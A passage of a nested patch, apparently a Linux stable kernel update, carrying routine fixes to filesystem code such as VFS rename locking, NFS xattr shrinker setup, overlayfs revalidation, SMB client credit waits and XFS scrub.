++	spin_unlock(&kernfs_idr_lock);
+  err_out2:
+ 	kmem_cache_free(kernfs_node_cache, kn);
+  err_out1:
+diff --git a/fs/lockd/svc.c b/fs/lockd/svc.c
+index 59ef8a1f843f3..5579e67da17db 100644
+--- a/fs/lockd/svc.c
++++ b/fs/lockd/svc.c
+@@ -355,7 +355,6 @@ static int lockd_get(void)
+ 	int error;
+ 
+ 	if (nlmsvc_serv) {
+-		svc_get(nlmsvc_serv);
+ 		nlmsvc_users++;
+ 		return 0;
+ 	}
+diff --git a/fs/namei.c b/fs/namei.c
+index 9155ecb547ce6..5b3865ad9d052 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -3007,8 +3007,8 @@ struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
+ 		return p;
+ 	}
+ 
+-	inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
+-	inode_lock_nested(p2->d_inode, I_MUTEX_PARENT2);
++	lock_two_inodes(p1->d_inode, p2->d_inode,
++			I_MUTEX_PARENT, I_MUTEX_PARENT2);
+ 	return NULL;
+ }
+ EXPORT_SYMBOL(lock_rename);
+@@ -4661,7 +4661,7 @@ SYSCALL_DEFINE2(link, const char __user *, oldname, const char __user *, newname
+  *	   sb->s_vfs_rename_mutex. We might be more accurate, but that's another
+  *	   story.
+  *	c) we have to lock _four_ objects - parents and victim (if it exists),
+- *	   and source (if it is not a directory).
++ *	   and source.
+  *	   And that - after we got ->i_mutex on parents (until then we don't know
+  *	   whether the target exists).  Solution: try to be smart with locking
+  *	   order for inodes.  We rely on the fact that tree topology may change
+@@ -4745,10 +4745,16 @@ int vfs_rename(struct renamedata *rd)
+ 
+ 	take_dentry_name_snapshot(&old_name, old_dentry);
+ 	dget(new_dentry);
+-	if (!is_dir || (flags & RENAME_EXCHANGE))
+-		lock_two_nondirectories(source, target);
+-	else if (target)
+-		inode_lock(target);
++	/*
++	 * Lock all moved children. Moved directories may need to change parent
++	 * pointer so they need the lock to prevent against concurrent
++	 * directory changes moving parent pointer. For regular files we've
++	 * historically always done this. The lockdep locking subclasses are
++	 * somewhat arbitrary but RENAME_EXCHANGE in particular can swap
++	 * regular files and directories so it's difficult to tell which
++	 * subclasses to use.
++	 */
++	lock_two_inodes(source, target, I_MUTEX_NORMAL, I_MUTEX_NONDIR2);
+ 
+ 	error = -EPERM;
+ 	if (IS_SWAPFILE(source) || (target && IS_SWAPFILE(target)))
+@@ -4796,9 +4802,8 @@ int vfs_rename(struct renamedata *rd)
+ 			d_exchange(old_dentry, new_dentry);
+ 	}
+ out:
+-	if (!is_dir || (flags & RENAME_EXCHANGE))
+-		unlock_two_nondirectories(source, target);
+-	else if (target)
++	inode_unlock(source);
++	if (target)
+ 		inode_unlock(target);
+ 	dput(new_dentry);
+ 	if (!error) {
+diff --git a/fs/nfs/nfs42xattr.c b/fs/nfs/nfs42xattr.c
+index 76ae118342066..911f634ba3da7 100644
+--- a/fs/nfs/nfs42xattr.c
++++ b/fs/nfs/nfs42xattr.c
+@@ -991,6 +991,29 @@ static void nfs4_xattr_cache_init_once(void *p)
+ 	INIT_LIST_HEAD(&cache->dispose);
+ }
+ 
++static int nfs4_xattr_shrinker_init(struct shrinker *shrinker,
++				    struct list_lru *lru, const char *name)
++{
++	int ret = 0;
++
++	ret = register_shrinker(shrinker, name);
++	if (ret)
++		return ret;
++
++	ret = list_lru_init_memcg(lru, shrinker);
++	if (ret)
++		unregister_shrinker(shrinker);
++
++	return ret;
++}
++
++static void nfs4_xattr_shrinker_destroy(struct shrinker *shrinker,
++					struct list_lru *lru)
++{
++	unregister_shrinker(shrinker);
++	list_lru_destroy(lru);
++}
++
+ int __init nfs4_xattr_cache_init(void)
+ {
+ 	int ret = 0;
+@@ -1002,44 +1025,30 @@ int __init nfs4_xattr_cache_init(void)
+ 	if (nfs4_xattr_cache_cachep == NULL)
+ 		return -ENOMEM;
+ 
+-	ret = list_lru_init_memcg(&nfs4_xattr_large_entry_lru,
+-	    &nfs4_xattr_large_entry_shrinker);
+-	if (ret)
+-		goto out4;
+-
+-	ret = list_lru_init_memcg(&nfs4_xattr_entry_lru,
+-	    &nfs4_xattr_entry_shrinker);
+-	if (ret)
+-		goto out3;
+-
+-	ret = list_lru_init_memcg(&nfs4_xattr_cache_lru,
+-	    &nfs4_xattr_cache_shrinker);
+-	if (ret)
+-		goto out2;
+-
+-	ret = register_shrinker(&nfs4_xattr_cache_shrinker, "nfs-xattr_cache");
++	ret = nfs4_xattr_shrinker_init(&nfs4_xattr_cache_shrinker,
++				       &nfs4_xattr_cache_lru,
++				       "nfs-xattr_cache");
+ 	if (ret)
+ 		goto out1;
+ 
+-	ret = register_shrinker(&nfs4_xattr_entry_shrinker, "nfs-xattr_entry");
++	ret = nfs4_xattr_shrinker_init(&nfs4_xattr_entry_shrinker,
++				       &nfs4_xattr_entry_lru,
++				       "nfs-xattr_entry");
+ 	if (ret)
+-		goto out;
++		goto out2;
+ 
+-	ret = register_shrinker(&nfs4_xattr_large_entry_shrinker,
+-				"nfs-xattr_large_entry");
++	ret = nfs4_xattr_shrinker_init(&nfs4_xattr_large_entry_shrinker,
++				       &nfs4_xattr_large_entry_lru,
++				       "nfs-xattr_large_entry");
+ 	if (!ret)
+ 		return 0;
+ 
+-	unregister_shrinker(&nfs4_xattr_entry_shrinker);
+-out:
+-	unregister_shrinker(&nfs4_xattr_cache_shrinker);
+-out1:
+-	list_lru_destroy(&nfs4_xattr_cache_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_entry_shrinker,
++				    &nfs4_xattr_entry_lru);
+ out2:
+-	list_lru_destroy(&nfs4_xattr_entry_lru);
+-out3:
+-	list_lru_destroy(&nfs4_xattr_large_entry_lru);
+-out4:
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_cache_shrinker,
++				    &nfs4_xattr_cache_lru);
++out1:
+ 	kmem_cache_destroy(nfs4_xattr_cache_cachep);
+ 
+ 	return ret;
+@@ -1047,11 +1056,11 @@ out4:
+ 
+ void nfs4_xattr_cache_exit(void)
+ {
+-	unregister_shrinker(&nfs4_xattr_large_entry_shrinker);
+-	unregister_shrinker(&nfs4_xattr_entry_shrinker);
+-	unregister_shrinker(&nfs4_xattr_cache_shrinker);
+-	list_lru_destroy(&nfs4_xattr_large_entry_lru);
+-	list_lru_destroy(&nfs4_xattr_entry_lru);
+-	list_lru_destroy(&nfs4_xattr_cache_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_large_entry_shrinker,
++				    &nfs4_xattr_large_entry_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_entry_shrinker,
++				    &nfs4_xattr_entry_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_cache_shrinker,
++				    &nfs4_xattr_cache_lru);
+ 	kmem_cache_destroy(nfs4_xattr_cache_cachep);
+ }
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 70e76359909cc..177cb7b089b9a 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -921,6 +921,7 @@ out:
+ out_noaction:
+ 	return ret;
+ session_recover:
++	set_bit(NFS4_SLOT_TBL_DRAINING, &session->fc_slot_table.slot_tbl_state);
+ 	nfs4_schedule_session_recovery(session, status);
+ 	dprintk("%s ERROR: %d Reset session\n", __func__, status);
+ 	nfs41_sequence_free_slot(res);
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 8f5b41dc07734..8f90a87ee9ca0 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -3872,7 +3872,7 @@ nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_op
+ 		p = xdr_reserve_space(xdr, 32);
+ 		if (!p)
+ 			return nfserr_resource;
+-		*p++ = cpu_to_be32(0);
++		*p++ = cpu_to_be32(open->op_recall);
+ 
+ 		/*
+ 		 * TODO: space_limit's in delegations
+diff --git a/fs/notify/fanotify/fanotify_user.c b/fs/notify/fanotify/fanotify_user.c
+index 4546da4a54f95..9df5db0f10ff2 100644
+--- a/fs/notify/fanotify/fanotify_user.c
++++ b/fs/notify/fanotify/fanotify_user.c
+@@ -1574,6 +1574,20 @@ static int fanotify_events_supported(struct fsnotify_group *group,
+ 	    path->mnt->mnt_sb->s_type->fs_flags & FS_DISALLOW_NOTIFY_PERM)
+ 		return -EINVAL;
+ 
++	/*
++	 * mount and sb marks are not allowed on kernel internal pseudo fs,
++	 * like pipe_mnt, because that would subscribe to events on all the
++	 * anonynous pipes in the system.
++	 *
++	 * SB_NOUSER covers all of the internal pseudo fs whose objects are not
++	 * exposed to user's mount namespace, but there are other SB_KERNMOUNT
++	 * fs, like nsfs, debugfs, for which the value of allowing sb and mount
++	 * mark is questionable. For now we leave them alone.
++	 */
++	if (mark_type != FAN_MARK_INODE &&
++	    path->mnt->mnt_sb->s_flags & SB_NOUSER)
++		return -EINVAL;
++
+ 	/*
+ 	 * We shouldn't have allowed setting dirent events and the directory
+ 	 * flags FAN_ONDIR and FAN_EVENT_ON_CHILD in mask of non-dir inode,
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index ea582b4fe1d9d..88866bcd1a218 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -178,6 +178,9 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	for (ret = 0, off = 0; off < size; off += unpacked_ea_size(ea)) {
+ 		ea = Add2Ptr(ea_all, off);
+ 
++		if (!ea->name_len)
++			break;
++
+ 		if (buffer) {
+ 			if (ret + ea->name_len + 1 > bytes_per_buffer) {
+ 				err = -ERANGE;
+diff --git a/fs/ocfs2/cluster/tcp.c b/fs/ocfs2/cluster/tcp.c
+index 785cabd71d670..4e083e25d0e7d 100644
+--- a/fs/ocfs2/cluster/tcp.c
++++ b/fs/ocfs2/cluster/tcp.c
+@@ -2083,18 +2083,24 @@ void o2net_stop_listening(struct o2nm_node *node)
+ 
+ int o2net_init(void)
+ {
++	struct folio *folio;
++	void *p;
+ 	unsigned long i;
+ 
+ 	o2quo_init();
+-
+ 	o2net_debugfs_init();
+ 
+-	o2net_hand = kzalloc(sizeof(struct o2net_handshake), GFP_KERNEL);
+-	o2net_keep_req = kzalloc(sizeof(struct o2net_msg), GFP_KERNEL);
+-	o2net_keep_resp = kzalloc(sizeof(struct o2net_msg), GFP_KERNEL);
+-	if (!o2net_hand || !o2net_keep_req || !o2net_keep_resp)
++	folio = folio_alloc(GFP_KERNEL | __GFP_ZERO, 0);
++	if (!folio)
+ 		goto out;
+ 
++	p = folio_address(folio);
++	o2net_hand = p;
++	p += sizeof(struct o2net_handshake);
++	o2net_keep_req = p;
++	p += sizeof(struct o2net_msg);
++	o2net_keep_resp = p;
++
+ 	o2net_hand->protocol_version = cpu_to_be64(O2NET_PROTOCOL_VERSION);
+ 	o2net_hand->connector_id = cpu_to_be64(1);
+ 
+@@ -2120,9 +2126,6 @@ int o2net_init(void)
+ 	return 0;
+ 
+ out:
+-	kfree(o2net_hand);
+-	kfree(o2net_keep_req);
+-	kfree(o2net_keep_resp);
+ 	o2net_debugfs_exit();
+ 	o2quo_exit();
+ 	return -ENOMEM;
+@@ -2131,8 +2134,6 @@ out:
+ void o2net_exit(void)
+ {
+ 	o2quo_exit();
+-	kfree(o2net_hand);
+-	kfree(o2net_keep_req);
+-	kfree(o2net_keep_resp);
+ 	o2net_debugfs_exit();
++	folio_put(virt_to_folio(o2net_hand));
+ }
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index 91a95bfad0d1c..edc1ebff33f5a 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -538,6 +538,7 @@ static int ovl_link_up(struct ovl_copy_up_ctx *c)
+ 			/* Restore timestamps on parent (best effort) */
+ 			ovl_set_timestamps(ofs, upperdir, &c->pstat);
+ 			ovl_dentry_set_upper_alias(c->dentry);
++			ovl_dentry_update_reval(c->dentry, upper);
+ 		}
+ 	}
+ 	inode_unlock(udir);
+@@ -857,6 +858,7 @@ static int ovl_do_copy_up(struct ovl_copy_up_ctx *c)
+ 		inode_unlock(udir);
+ 
+ 		ovl_dentry_set_upper_alias(c->dentry);
++		ovl_dentry_update_reval(c->dentry, ovl_dentry_upper(c->dentry));
+ 	}
+ 
+ out:
+diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c
+index c3032cef391ef..5339ff08bd0f4 100644
+--- a/fs/overlayfs/dir.c
++++ b/fs/overlayfs/dir.c
+@@ -269,8 +269,7 @@ static int ovl_instantiate(struct dentry *dentry, struct inode *inode,
+ 
+ 	ovl_dir_modified(dentry->d_parent, false);
+ 	ovl_dentry_set_upper_alias(dentry);
+-	ovl_dentry_update_reval(dentry, newdentry,
+-			DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_reval(dentry, newdentry);
+ 
+ 	if (!hardlink) {
+ 		/*
+diff --git a/fs/overlayfs/export.c b/fs/overlayfs/export.c
+index ac9c3ad04016e..e55363d343dc6 100644
+--- a/fs/overlayfs/export.c
++++ b/fs/overlayfs/export.c
+@@ -326,8 +326,7 @@ static struct dentry *ovl_obtain_alias(struct super_block *sb,
+ 	if (upper_alias)
+ 		ovl_dentry_set_upper_alias(dentry);
+ 
+-	ovl_dentry_update_reval(dentry, upper,
+-			DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_reval(dentry, upper);
+ 
+ 	return d_instantiate_anon(dentry, inode);
+ 
+diff --git a/fs/overlayfs/namei.c b/fs/overlayfs/namei.c
+index 0fd1d5fdfc728..655d08d6f3f17 100644
+--- a/fs/overlayfs/namei.c
++++ b/fs/overlayfs/namei.c
+@@ -1116,8 +1116,7 @@ struct dentry *ovl_lookup(struct inode *dir, struct dentry *dentry,
+ 			ovl_set_flag(OVL_UPPERDATA, inode);
+ 	}
+ 
+-	ovl_dentry_update_reval(dentry, upperdentry,
+-			DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_reval(dentry, upperdentry);
+ 
+ 	revert_creds(old_cred);
+ 	if (origin_path) {
+diff --git a/fs/overlayfs/overlayfs.h b/fs/overlayfs/overlayfs.h
+index e74a610a117ec..052226aa7de09 100644
+--- a/fs/overlayfs/overlayfs.h
++++ b/fs/overlayfs/overlayfs.h
+@@ -360,8 +360,10 @@ bool ovl_index_all(struct super_block *sb);
+ bool ovl_verify_lower(struct super_block *sb);
+ struct ovl_entry *ovl_alloc_entry(unsigned int numlower);
+ bool ovl_dentry_remote(struct dentry *dentry);
+-void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *upperdentry,
+-			     unsigned int mask);
++void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *realdentry);
++void ovl_dentry_init_reval(struct dentry *dentry, struct dentry *upperdentry);
++void ovl_dentry_init_flags(struct dentry *dentry, struct dentry *upperdentry,
++			   unsigned int mask);
+ bool ovl_dentry_weird(struct dentry *dentry);
+ enum ovl_path_type ovl_path_type(struct dentry *dentry);
+ void ovl_path_upper(struct dentry *dentry, struct path *path);
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 3d14a3f1465d1..51eec4a8e82b2 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -1980,7 +1980,7 @@ static struct dentry *ovl_get_root(struct super_block *sb,
+ 	ovl_dentry_set_flag(OVL_E_CONNECTED, root);
+ 	ovl_set_upperdata(d_inode(root));
+ 	ovl_inode_init(d_inode(root), &oip, ino, fsid);
+-	ovl_dentry_update_reval(root, upperdentry, DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_flags(root, upperdentry, DCACHE_OP_WEAK_REVALIDATE);
+ 
+ 	return root;
+ }
+diff --git a/fs/overlayfs/util.c b/fs/overlayfs/util.c
+index 81a57a8d80d9a..850e8d1bf8296 100644
+--- a/fs/overlayfs/util.c
++++ b/fs/overlayfs/util.c
+@@ -94,14 +94,30 @@ struct ovl_entry *ovl_alloc_entry(unsigned int numlower)
+ 	return oe;
+ }
+ 
++#define OVL_D_REVALIDATE (DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE)
++
+ bool ovl_dentry_remote(struct dentry *dentry)
+ {
+-	return dentry->d_flags &
+-		(DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	return dentry->d_flags & OVL_D_REVALIDATE;
++}
++
++void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *realdentry)
++{
++	if (!ovl_dentry_remote(realdentry))
++		return;
++
++	spin_lock(&dentry->d_lock);
++	dentry->d_flags |= realdentry->d_flags & OVL_D_REVALIDATE;
++	spin_unlock(&dentry->d_lock);
++}
++
++void ovl_dentry_init_reval(struct dentry *dentry, struct dentry *upperdentry)
++{
++	return ovl_dentry_init_flags(dentry, upperdentry, OVL_D_REVALIDATE);
+ }
+ 
+-void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *upperdentry,
+-			     unsigned int mask)
++void ovl_dentry_init_flags(struct dentry *dentry, struct dentry *upperdentry,
++			   unsigned int mask)
+ {
+ 	struct ovl_entry *oe = OVL_E(dentry);
+ 	unsigned int i, flags = 0;
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index 8bf09886e7e66..2384de1c2d187 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -591,6 +591,8 @@ struct persistent_ram_zone *persistent_ram_new(phys_addr_t start, size_t size,
+ 	raw_spin_lock_init(&prz->buffer_lock);
+ 	prz->flags = flags;
+ 	prz->label = kstrdup(label, GFP_KERNEL);
++	if (!prz->label)
++		goto err;
+ 
+ 	ret = persistent_ram_buffer_map(start, size, prz, memtype);
+ 	if (ret)
+diff --git a/fs/ramfs/inode.c b/fs/ramfs/inode.c
+index b3257e8528200..f368a16906fb4 100644
+--- a/fs/ramfs/inode.c
++++ b/fs/ramfs/inode.c
+@@ -278,7 +278,7 @@ int ramfs_init_fs_context(struct fs_context *fc)
+ 	return 0;
+ }
+ 
+-static void ramfs_kill_sb(struct super_block *sb)
++void ramfs_kill_sb(struct super_block *sb)
+ {
+ 	kfree(sb->s_fs_info);
+ 	kill_litter_super(sb);
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 87dcffece7623..9a367d4c74e47 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -5140,20 +5140,19 @@ oplock_break_ack:
+ 
+ 	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
+ 	/*
+-	 * releasing stale oplock after recent reconnect of smb session using
+-	 * a now incorrect file handle is not a data integrity issue but do
+-	 * not bother sending an oplock release if session to server still is
+-	 * disconnected since oplock already released by the server
++	 * MS-SMB2 3.2.5.19.1 and 3.2.5.19.2 (and MS-CIFS 3.2.5.42) do not require
++	 * an acknowledgment to be sent when the file has already been closed.
++	 * check for server null, since can race with kill_sb calling tree disconnect.
+ 	 */
+-	if (!oplock_break_cancelled) {
+-		/* check for server null since can race with kill_sb calling tree disconnect */
+-		if (tcon->ses && tcon->ses->server) {
+-			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+-				volatile_fid, net_fid, cinode);
+-			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+-		} else
+-			pr_warn_once("lease break not sent for unmounted share\n");
+-	}
++	spin_lock(&cinode->open_file_lock);
++	if (tcon->ses && tcon->ses->server && !oplock_break_cancelled &&
++					!list_empty(&cinode->openFileList)) {
++		spin_unlock(&cinode->open_file_lock);
++		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++						volatile_fid, net_fid, cinode);
++		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++	} else
++		spin_unlock(&cinode->open_file_lock);
+ 
+ 	cifs_done_oplock_break(cinode);
+ }
+diff --git a/fs/smb/client/smb2inode.c b/fs/smb/client/smb2inode.c
+index c97e049e29dd3..5ddc629e62168 100644
+--- a/fs/smb/client/smb2inode.c
++++ b/fs/smb/client/smb2inode.c
+@@ -397,9 +397,6 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 					rsp_iov);
+ 
+  finished:
+-	if (cfile)
+-		cifsFileInfo_put(cfile);
+-
+ 	SMB2_open_free(&rqst[0]);
+ 	if (rc == -EREMCHG) {
+ 		pr_warn_once("server share %s deleted\n", tcon->tree_name);
+@@ -513,6 +510,9 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		break;
+ 	}
+ 
++	if (cfile)
++		cifsFileInfo_put(cfile);
++
+ 	if (rc && err_iov && err_buftype) {
+ 		memcpy(err_iov, rsp_iov, 3 * sizeof(*err_iov));
+ 		memcpy(err_buftype, resp_buftype, 3 * sizeof(*err_buftype));
+@@ -592,9 +592,6 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 			if (islink)
+ 				rc = -EREMOTE;
+ 		}
+-		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+-			rc = -EOPNOTSUPP;
+ 	}
+ 
+ out:
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index d512440d35b6f..e6a191a7499e8 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -208,6 +208,16 @@ smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+ 
+ 	spin_lock(&server->req_lock);
+ 	while (1) {
++		spin_unlock(&server->req_lock);
++
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsExiting) {
++			spin_unlock(&server->srv_lock);
++			return -ENOENT;
++		}
++		spin_unlock(&server->srv_lock);
++
++		spin_lock(&server->req_lock);
+ 		if (server->credits <= 0) {
+ 			spin_unlock(&server->req_lock);
+ 			cifs_num_waiters_inc(server);
+@@ -218,15 +228,6 @@ smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+ 				return rc;
+ 			spin_lock(&server->req_lock);
+ 		} else {
+-			spin_unlock(&server->req_lock);
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+-			spin_lock(&server->req_lock);
+ 			scredits = server->credits;
+ 			/* can deadlock with reopen */
+ 			if (scredits <= 8) {
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index c961b90f92b9f..e03ffcf7e201c 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -549,6 +549,16 @@ wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+ 	}
+ 
+ 	while (1) {
++		spin_unlock(&server->req_lock);
++
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsExiting) {
++			spin_unlock(&server->srv_lock);
++			return -ENOENT;
++		}
++		spin_unlock(&server->srv_lock);
++
++		spin_lock(&server->req_lock);
+ 		if (*credits < num_credits) {
+ 			scredits = *credits;
+ 			spin_unlock(&server->req_lock);
+@@ -574,15 +584,6 @@ wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+ 				return -ERESTARTSYS;
+ 			spin_lock(&server->req_lock);
+ 		} else {
+-			spin_unlock(&server->req_lock);
+-
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+ 			/*
+ 			 * For normal commands, reserve the last MAX_COMPOUND
+ 			 * credits to compound requests.
+@@ -596,7 +597,6 @@ wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+ 			 * for servers that are slow to hand out credits on
+ 			 * new sessions.
+ 			 */
+-			spin_lock(&server->req_lock);
+ 			if (!optype && num_credits == 1 &&
+ 			    server->in_flight > 2 * MAX_COMPOUND &&
+ 			    *credits <= MAX_COMPOUND) {
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index 05d7f3e910bf4..d937e2f45c829 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -536,7 +536,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+ 	out[baselen + 3] = PERIOD;
+ 
+ 	if (dot_present)
+-		memcpy(&out[baselen + 4], extension, 4);
++		memcpy(out + baselen + 4, extension, 4);
+ 	else
+ 		out[baselen + 4] = '\0';
+ 	smbConvertToUTF16((__le16 *)shortname, out, PATH_MAX,
+diff --git a/fs/xfs/scrub/common.c b/fs/xfs/scrub/common.c
+index 9bbbf20f401b3..e71449658ecc3 100644
+--- a/fs/xfs/scrub/common.c
++++ b/fs/xfs/scrub/common.c
+@@ -865,29 +865,3 @@ xchk_ilock_inverted(
+ 	}
+ 	return -EDEADLOCK;
+ }
+-
+-/* Pause background reaping of resources. */
+-void
+-xchk_stop_reaping(
+-	struct xfs_scrub	*sc)
+-{
+-	sc->flags |= XCHK_REAPING_DISABLED;
+-	xfs_blockgc_stop(sc->mp);
+-	xfs_inodegc_stop(sc->mp);
+-}
+-
+-/* Restart background reaping of resources. */
+-void
+-xchk_start_reaping(
+-	struct xfs_scrub	*sc)
+-{
+-	/*
+-	 * Readonly filesystems do not perform inactivation or speculative
+-	 * preallocation, so there's no need to restart the workers.
+-	 */
+-	if (!xfs_is_readonly(sc->mp)) {
+-		xfs_inodegc_start(sc->mp);
+-		xfs_blockgc_start(sc->mp);
+-	}
+-	sc->flags &= ~XCHK_REAPING_DISABLED;
+-}
+diff --git a/fs/xfs/scrub/common.h b/fs/xfs/scrub/common.h
+index 454145db10e71..2ca80102e704a 100644
+--- a/fs/xfs/scrub/common.h
++++ b/fs/xfs/scrub/common.h
+@@ -148,7 +148,5 @@ static inline bool xchk_skip_xref(struct xfs_scrub_metadata *sm)
+ 
+ int xchk_metadata_inode_forks(struct xfs_scrub *sc);
+ int xchk_ilock_inverted(struct xfs_inode *ip, uint lock_mode);
+-void xchk_stop_reaping(struct xfs_scrub *sc);
+-void xchk_start_reaping(struct xfs_scrub *sc);
+ 
+ #endif	/* __XFS_SCRUB_COMMON_H__ */
+diff --git a/fs/xfs/scrub/fscounters.c b/fs/xfs/scrub/fscounters.c
+index 6a6f8fe7f87c0..88d6961e38866 100644
+--- a/fs/xfs/scrub/fscounters.c
++++ b/fs/xfs/scrub/fscounters.c
+@@ -128,13 +128,6 @@ xchk_setup_fscounters(
+ 	if (error)
+ 		return error;
+ 
+-	/*
+-	 * Pause background reclaim while we're scrubbing to reduce the
+-	 * likelihood of background perturbations to the counters throwing off
+-	 * our calculations.
+-	 */
+-	xchk_stop_reaping(sc);
+-
+ 	return xchk_trans_alloc(sc, 0);
+ }
+ 
+@@ -353,6 +346,12 @@ xchk_fscounters(
+ 	if (fdblocks > mp->m_sb.sb_dblocks)
+ 		xchk_set_corrupt(sc);
+ 
++	/*
++	 * XXX: We can't quiesce percpu counter updates, so exit early.
++	 * This can be re-enabled when we gain exclusive freeze functionality.
++	 */
++	return 0;
++
+ 	/*
+ 	 * If ifree exceeds icount by more than the minimum variance then
+ 	 * something's probably wrong with the counters.
+diff --git a/fs/xfs/scrub/scrub.c b/fs/xfs/scrub/scrub.c
+index 2e8e400f10a9a..95132490fda5e 100644
+--- a/fs/xfs/scrub/scrub.c
++++ b/fs/xfs/scrub/scrub.c
+@@ -171,8 +171,6 @@ xchk_teardown(
+ 	}
+ 	if (sc->sm->sm_flags & XFS_SCRUB_IFLAG_REPAIR)
+ 		mnt_drop_write_file(sc->file);
+-	if (sc->flags & XCHK_REAPING_DISABLED)
+-		xchk_start_reaping(sc);
+ 	if (sc->buf) {
+ 		kmem_free(sc->buf);
+ 		sc->buf = NULL;
+diff --git a/fs/xfs/scrub/scrub.h b/fs/xfs/scrub/scrub.h
+index 3de5287e98d84..4cb32c27df102 100644
+--- a/fs/xfs/scrub/scrub.h
++++ b/fs/xfs/scrub/scrub.h
+@@ -88,7 +88,6 @@ struct xfs_scrub {
+ 
+ /* XCHK state flags grow up from zero, XREP state flags grown down from 2^31 */
+ #define XCHK_TRY_HARDER		(1 << 0)  /* can't get resources, try again */
+-#define XCHK_REAPING_DISABLED	(1 << 2)  /* background block reaping paused */
+ #define XREP_ALREADY_FIXED	(1 << 31) /* checking our repair work */
+ 
+ /* Metadata scrubbers */
+diff --git a/fs/xfs/xfs_icache.c b/fs/xfs/xfs_icache.c
+index eae7427062cf9..d884cba1d7072 100644
+--- a/fs/xfs/xfs_icache.c
++++ b/fs/xfs/xfs_icache.c
+@@ -431,18 +431,23 @@ xfs_iget_check_free_state(
+ }
+ 
+ /* Make all pending inactivation work start immediately. */
+-static void
++static bool
+ xfs_inodegc_queue_all(
+ 	struct xfs_mount	*mp)
+ {
+ 	struct xfs_inodegc	*gc;
+ 	int			cpu;
++	bool			ret = false;
+ 
+ 	for_each_online_cpu(cpu) {
+ 		gc = per_cpu_ptr(mp->m_inodegc, cpu);
+-		if (!llist_empty(&gc->list))
++		if (!llist_empty(&gc->list)) {
+ 			mod_delayed_work_on(cpu, mp->m_inodegc_wq, &gc->work, 0);
++			ret = true;
++		}
+ 	}
++
++	return ret;
+ }
+ 
+ /*
+@@ -1848,6 +1853,8 @@ xfs_inodegc_worker(
